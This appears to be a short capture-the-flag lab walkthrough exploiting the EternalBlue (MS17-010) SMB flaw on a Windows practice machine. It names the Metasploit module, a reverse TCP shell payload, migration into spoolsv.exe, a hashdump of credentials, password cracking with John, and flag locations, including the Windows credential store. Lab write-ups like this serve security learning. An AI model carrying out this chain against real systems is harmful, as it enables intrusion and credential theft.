This machine appears to be the exploit for eternal blue

Time to enumerate!


It is looking for how many ports are open under 1000. We have 3

Next we are looking for what vulnerability the machine is susceptible to.

With this I was able to learn about a new nmap script –script vuln

This will look for any vulnerabilities on the machine. Pretty cool

Looks like it is ms17-010

Up next it instructs us to launch metasploit and search for the vulnerability

We are going to utilize exploit/windows/smb/ms17_010_eternalblue

Checking out the options, we’ll need to update just the Rhost to our remote machine

Running a check it looks like its vulnerable

It does advise us to set the payload before running

set payload windows/x64/shell/reverse_tcp

From here we are going to escalate

First we will background using the background command

Next we are going to turn the shell into a meterpreter shell — Shell to Meterpreter

With the new shell we can check processes

We are going to migrate to spoolsv.exe using the command migrate 1304

Up next we are going to dump any hashes using the meterpreter command hashdump

The name of the non-default user is jon

From here we are going to attempt to crack his password

Originally went with hashcat to attempt to crack it but it did not return results for me

SO next we’re going to try with John

This gives us the password alqfna22

Next and lastly, we are going to find the flags This flag can be found at the system root. 

Navigating to the C: folder we get flag1.txt

Flag 2: This flag can be found at the location where passwords are stored within Windows

We were able to locate by navigating to Windows\System32\config

Last flag we were able to navigate to users/Jon/Documents and find it